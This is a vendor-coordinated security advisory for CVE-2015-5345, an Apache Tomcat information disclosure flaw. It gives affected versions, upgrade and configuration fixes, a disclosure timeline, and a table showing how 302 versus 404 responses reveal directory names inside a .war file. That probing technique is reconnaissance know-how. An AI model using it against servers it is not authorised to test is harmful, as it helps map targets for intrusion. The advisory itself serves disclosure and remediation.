================================================================================
Information disclosure vulnerability in Apache Tomcat
================================================================================
Web version at:
http://www.qcsec.com/blog/CVE-2015-5345-apache-tomcat-vulnerability.html
================================================================================
On a pentest for a client we discovered a way to obtain information about a web
application's internal structure from the network. We reported the issue to the
vendor and a fix was released. The following security advisory details the
vulnerability and how to resolve it.
CVE reference: CVE-2015-5345
CVSS score: 5.1 (medium)
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C
Affected systems
================
Apache Tomcat 9.0.0.M1
Apache Tomcat 8.0.0 to 8.0.29
Apache Tomcat 7.0.0 to 7.0.67
Apache Tomcat 6.0.0 to 6.0.44
Status of older (unsupported) versions of Apache Tomcat is unknown
Overview
========
Because the Apache Tomcat application server responds to HTTP requests for
directories with a redirect (appending a trailing slash) if the directory
exists in the application's .war file, remote unauthenticated users could
detect the presence of an application, and map out the internal structure of
the application using a dictionary attack.
Impact
======
The impact of this issue is limited. The presence of a web application can be
detected, and the use of Java can be detected even if identifying headers have
been disabled (by trying to request the WEB-INF directory). Also, an attacker
can determine if a certain string is a valid directory name in the
application's .war file.
Solution
========
Upgrade your Apache Tomcat installation to at least version 9.0.0.M3, 8.0.30,
7.0.68 or 6.0.45.
Note that two new configuration directives were introduced in these versions of
Apache Tomcat, one to re-enable Tomcat identifying directories
(mapperDirectoryRedirectEnabled, off by default), and one to enable the web
application presence identifying behaviour (mapperContextRootRedirectEnabled,
on by default because switching it off might cause issues with existing web
applications).
So to completely solve this issue, update Apache Tomcat and switch off
mapperContextRootRedirectEnabled for any web applications that you wish to be
undetectable by unauthenticated visitors.
Note (2) that earlier minor versions of Apache 6, 7, and 8 released after
October 2015 may also be not vulnerable to this issue as fixes were introduced
but re-engineered in the current versions due to regression issues. Update to
at least one of the versions listed above to be sure of having the fix as
described.
Technical details
=================
When a request is received for a non-existent resource, Tomcat responds with a
response code of 404 as normal. However if there is a directory in the
application's .war file corresponding to the requested name, Tomcat responds
with a 302 redirect, adding a trailing slash to the request (which only then
yields the 404).
For example:
+------------------------------+----------------------------------+
| Requested URL | HTTP response |
+------------------------------+----------------------------------+
| http://server/does-not-exist | HTTP/1.1 404 Not Found |
+------------------------------+----------------------------------+
| http://server/WEB-INF | HTTP/1.1 302 Found |
| | Location: http://server/WEB-INF/ |
+------------------------------+----------------------------------+
| http://server/WEB-INF/ | HTTP/1.1 404 Not Found |
+------------------------------+----------------------------------+
This works for any directory inside the application's .war file, including
things like META-INF or WEB-INF/classes.
Responsible disclosure timeline
===============================
12-Oct-2015 reported to the Apache Tomcat Security Team
13-Oct-2015 report acknowledged
21-Oct-2015 confirmed as a low-risk security issue and informed that it
would be fixed
19-Nov-2015 CVE assigned and fix committed
Dec-2015 initial updates released for Tomcat 6, 7, 8, and 9. Because a
regression occurred for some users the announcement was postponed
until new versions were available with the fix as an optional
configuration parameter (see above).
08-Feb-2016 Apache Tomcat 9.0.0.M3 released
10-Feb-2016 Apache Tomcat 8.0.32 released
12-Feb-2016 Apache Tomcat 6.0.45 released
18-Feb-2016 Apache Tomcat 7.0.68 released
22-Feb-2016 announcement released, this document published
Vendor advisory
===============
https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.45
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.68
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.30
https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M3
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
